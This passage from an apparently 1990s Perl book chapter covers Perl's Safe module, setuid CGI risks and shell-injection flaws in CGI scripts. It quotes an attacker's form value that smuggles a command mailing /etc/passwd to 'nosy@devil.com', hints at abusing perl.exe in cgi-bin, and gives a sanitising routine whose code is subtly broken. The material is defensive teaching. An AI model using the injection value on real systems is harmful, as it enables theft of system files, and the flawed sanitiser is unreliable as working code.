📄 ch11.htm
字号:
#<BR>
while (<DBFILE>)<BR>
</FONT></TT> <TT><FONT FACE="Courier"> {
<BR>
print $_;<BR>
</FONT></TT> <TT><FONT FACE="Courier"> }
<BR>
}<BR>
<BR>
$secure->share('&safecode', DBFILE);</FONT></TT>
</BLOCKQUOTE>
<P>
The <TT><FONT FACE="Courier">trap()</FONT></TT> and <TT><FONT FACE="Courier">untrap()</FONT></TT>
methods force the <TT><FONT FACE="Courier">Safe</FONT></TT> package
to trap and untrap instructions, respectively. The names of the
operators available to your program are listed in the <TT><FONT FACE="Courier">opcode.pl</FONT></TT>
and <TT><FONT FACE="Courier">opcode.h</FONT></TT>. The <TT><FONT FACE="Courier">share()</FONT></TT>
method makes the values specified in the argument list available
to the compartment's code. Therefore, the variables and statements
in the <TT><FONT FACE="Courier">safecode</FONT></TT> subroutine
are made available to the compartment. In the <TT><FONT FACE="Courier">safecode</FONT></TT>
compartment (shown previously), the <TT><FONT FACE="Courier">DBFILE</FONT></TT>
handle can be used in the subroutine <TT><FONT FACE="Courier">safecode</FONT></TT>
to retrieve the data.
<P>
The <TT><FONT FACE="Courier">Safe</FONT></TT> package also contains
utility subroutines for modifying name spaces and masks. To create
a mask by giving a list of operator names, use the <TT><FONT FACE="Courier">ops_to_mask()</FONT></TT>
function, which returns a mask with only those masked operators
that appear in the function's argument list. For example, to return
a mask with only <TT><FONT FACE="Courier">OP_SETPRIORITY</FONT></TT>
masked, use this call:
<BLOCKQUOTE>
<TT><FONT FACE="Courier">@mymask = ops_to_mask(OP_SETPRIORITY);</FONT></TT>
</BLOCKQUOTE>
<P>
The inverse of this call is to get a list of operator names given
an operator mask: <TT><FONT FACE="Courier">mask_to_ops (MASK)</FONT></TT>.
The names returned are those variables that are masked for the
package. The function <TT><FONT FACE="Courier">fullmask()</FONT></TT>
returns all ones and <TT><FONT FACE="Courier">emptymask()</FONT></TT>
returns all zeros. The function <TT><FONT FACE="Courier">MAXO()</FONT></TT>
returns the number of operators in this version of Perl.
<H2><A NAME="SetuidCGIScriptsandCGIwrap"><TT><FONT SIZE=5 COLOR=#FF0000 FACE="Courier">Setuid</FONT></TT><FONT SIZE=5 COLOR=#FF0000>
CGI Scripts and CGIwrap</FONT></A></H2>
<P>
CGI scripts are written in Perl mainly because of Perl's string
handling feature, as well as other powerful features. It's important
to discuss CGI security issues when using Perl.
<P>
A point to note about CGI scripts (which are more than likely
to be written in Perl): Most <TT><FONT FACE="Courier">httpd</FONT></TT>
daemons run as user "nobody" and do not change the <TT><FONT FACE="Courier">uid</FONT></TT>
to the CGI script's owner. Some daemons use a program called CGIwrap,
which provides a safer way to change user IDs. The latest version
of CGIwrap can be found with full documentation and source and
installation instructions at the following address:
<BLOCKQUOTE>
<TT><A HREF="http://wwwcgi.umr.edu/~cgiwrap" tppabs="http://wwwcgi.umr.edu/~cgiwrap">http://wwwcgi.umr.edu/~cgiwrap</A></TT>
</BLOCKQUOTE>
<P>
In any event, do not allow your CGI files the capability to write
to a file by giving write access to a "nobody" user.
Close your eyes and think of the entire sunsite archive on your
disk choking it to death. Whatever you do, never make CGI scripts
<TT><FONT FACE="Courier">setuid</FONT></TT>, period. <TT><FONT FACE="Courier">setuid</FONT></TT>
scripts have many more security holes than do normal CGI scripts
and are much more easily accessed from the rest of the world.
<P>
The easiest way to exploit <TT><FONT FACE="Courier">setuid</FONT></TT>
scripts is by modifying any used environment variables. Old versions
of Perl used to call the <TT><FONT FACE="Courier">csh</FONT></TT>
to process globs of the form <TT><FONT FACE="Courier"><*.c></FONT></TT>
in <TT><FONT FACE="Courier">eval</FONT></TT> statements. Providing
your own version of <TT><FONT FACE="Courier">csh</FONT></TT> for
the Perl interpreter could get you running as root.
<P>
Finally, the biggest faux pas of all is to place <TT><FONT FACE="Courier">perl.exe</FONT></TT>
in your <TT><FONT FACE="Courier">cgi-bin</FONT></TT> directory.
Do not do this! Putting your Perl.exe program in a globally executable
area is unforgivable because all you have to do is change the
top line of every Perl CGI script to point to Perl.
<P>
If you see a site being accessed via a URL as
<BLOCKQUOTE>
<TT>http://somewhere.com/cgibin/perl.exe?dothis.pl</TT>
</BLOCKQUOTE>
<P>
you know you are dealing with someone who is not concerned about
potentially running any script on his or her computer. How to
do this is left as an exercise for the reader. (Hint: try to recall
the command-line arguments to Perl.) Actually, some newsgroups
have had messages posted on them that indicate the regular search
engines like Alto Vista hunt down sites with gaping chasms in
security.
<P>
A common mistake in Perl is to use the following line in a <TT><FONT FACE="Courier">cgi-script</FONT></TT>:
<BLOCKQUOTE>
<TT><FONT FACE="Courier">system("/usr/sbin/sendmail -t $returnAddress
< $data");</FONT></TT>
</BLOCKQUOTE>
<P>
The system call shown above is sending contents of <TT><FONT FACE="Courier">$data</FONT></TT>
back to the address provided for by the variable <TT><FONT FACE="Courier">$returnAddress</FONT></TT>.
If both the values in <TT><FONT FACE="Courier">$data</FONT></TT>
and <TT><FONT FACE="Courier">$returnAddress</FONT></TT> rely on
environment variables, or worse yet, are in <TT><FONT FACE="Courier">FORM</FONT></TT>
field entries, you are opening your system up to a hacker who
can supply the name of a valuable file in <TT><FONT FACE="Courier">$data</FONT></TT>.
A hacker will be then able to return anything, including password
files, with this hole. On the hacker's side the command will set
the <TT><FONT FACE="Courier">VALUE</FONT></TT> of the request
to something like this:
<BLOCKQUOTE>
<TT><FONT FACE="Courier">VALUE="khusain@ikra.com;mail nosy@devil.com
</etc/passwd"</FONT></TT>
</BLOCKQUOTE>
<P>
In Perl, the <TT><FONT FACE="Courier">system</FONT></TT> command
is not the only command that will fork off a shell. Using <TT><FONT FACE="Courier">exec</FONT></TT>,
<TT><FONT FACE="Courier">eval</FONT></TT>, <TT><FONT FACE="Courier">pipe</FONT></TT>s,
or <TT><FONT FACE="Courier">backtick</FONT></TT>s will do the
same operation for you. The <TT><FONT FACE="Courier">eval</FONT></TT>
statement is potentially dangerous because it's the easiest to
bypass, even with the <TT><FONT FACE="Courier">-T</FONT></TT>
tainting checking flag turned on in Perl.
<P>
When sending mail, don't use <TT><FONT FACE="Courier">system()</FONT></TT>
calls. Rather, open a handle to <TT><FONT FACE="Courier">sendmail</FONT></TT>
directly. For example, use the following set of statements instead
of a system call:
<BLOCKQUOTE>
<TT><FONT FACE="Courier">open(MAIL, "|/usr/lib/sendmail -t");
<BR>
print MAIL "To: $myfriend\n";<BR>
</FONT></TT> <TT><FONT FACE="Courier">...<BR>
close(MAIL);</FONT></TT>
</BLOCKQUOTE>
<P>
Note the use of <TT><FONT FACE="Courier">sendmail</FONT></TT>,
not <TT><FONT FACE="Courier">mail</FONT></TT>, in this example.
The <TT><FONT FACE="Courier">mail</FONT></TT> program has a bug
in it that allows you to execute commands by preceding them with
a tilde (<TT><FONT FACE="Courier">~</FONT></TT>). The bug has
been fixed on newer systems, but can be a potential threat if
your system is not up-to-date.
<P>
Finally, it's also known that some programs exploit escape characters
in UNIX to run commands. Some of these potentially dangerous escape
characters are the semicolon (for continuing commands), the tilde
(<TT><FONT FACE="Courier">~</FONT></TT>), the at sign (<TT><FONT FACE="Courier">@</FONT></TT>
in mail fraud), the bang operator (<TT><FONT FACE="Courier">!</FONT></TT>),
and so on. You should just prepend the escape characters with
the backslash, thus rendering these escape characters useless
for the first pass through the <TT><FONT FACE="Courier">eval()</FONT></TT>
in Perl:
<BLOCKQUOTE>
<TT><FONT FACE="Courier">sub sanctify {<BR>
# will change, for example, user!sh to user\!sh<BR>
</FONT></TT> <TT><FONT FACE="Courier">my
@a = @_<BR>
@a =~ s/([;<>\*\|`&\$!#\(\)\[\]\{\}:'"])/\\$1/g;
<BR>
</FONT></TT> <TT><FONT FACE="Courier">return
@a;<BR>
}</FONT></TT>
</BLOCKQUOTE>
<P>
The solution will only catch and replace those characters shown
here. You should look at your system closely to see what other
characters may cause potential problems.
<H2><A NAME="ReferenceBooks"><FONT SIZE=5 COLOR=#FF0000>Reference
Books</FONT></A></H2>
<P>
The following texts will provide you with more information about
security and Perl scripts. Please remember that this is only a
partial list:
<UL>
<LI><I>Practical UNIX Security</I>, Simon Garfinkel and Gene Spafford,
O'Reilly & Associates, 1-56592-148-8, 1996.
<LI><I>Firewalls and Internet Security</I>, William Cheswick and
Steven M Bellovin, Addison-Wesley, 0-201-63357-4, 1994.
<LI><I>Essential System Administration</I>, Aeleen Frisch, O'Reilly
& Associates, Second edition, 1-56592-127-5, 1995.
</UL>
<H2><A NAME="Summary"><FONT SIZE=5 COLOR=#FF0000>Summary</FONT></A>
</H2>
<P>
Security issues are becoming increasingly important in the computing
world today. As more computers go online, more machines are being
opened up for attacks by hackers, especially because more CGI
scripts are written in Perl. Use the <TT><FONT FACE="Courier">-T</FONT></TT>
taint feature in Perl 5. Use the <TT><FONT FACE="Courier">Safe.pm</FONT></TT>
module if you can. Also, never place <TT><FONT FACE="Courier">perl.exe</FONT></TT>
in the <TT><FONT FACE="Courier">cgi-bin</FONT></TT> directory
and never let your Perl scripts run off a shell command that cannot
be written to. Remember that keeping Perl scripts secure in CGI
environments is an ongoing issue.
<P>
<HR WIDTH="100%"></P>
<CENTER><P><A HREF="ch10.htm" tppabs="http://www.mcp.com/815097600/0-672/0-672-30891-6/ch10.htm"><IMG SRC="pc.gif" tppabs="http://www.mcp.com/815097600/0-672/0-672-30891-6/pc.gif" BORDER=0 HEIGHT=88 WIDTH=140></A><A HREF="#CONTENTS"><IMG SRC="cc.gif" tppabs="http://www.mcp.com/815097600/0-672/0-672-30891-6/cc.gif" BORDER=0 HEIGHT=88 WIDTH=140></A><A HREF="index.htm" tppabs="http://www.mcp.com/815097600/0-672/0-672-30891-6/index.htm"><IMG SRC="hb.gif" tppabs="http://www.mcp.com/815097600/0-672/0-672-30891-6/hb.gif" BORDER=0 HEIGHT=88 WIDTH=140></A><A HREF="ch12.htm" tppabs="http://www.mcp.com/815097600/0-672/0-672-30891-6/ch12.htm"><IMG
SRC="nc.gif" tppabs="http://www.mcp.com/815097600/0-672/0-672-30891-6/nc.gif" BORDER=0 HEIGHT=88 WIDTH=140></A></P></CENTER>
<P>
<HR WIDTH="100%"></P>
</BODY>
</HTML>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -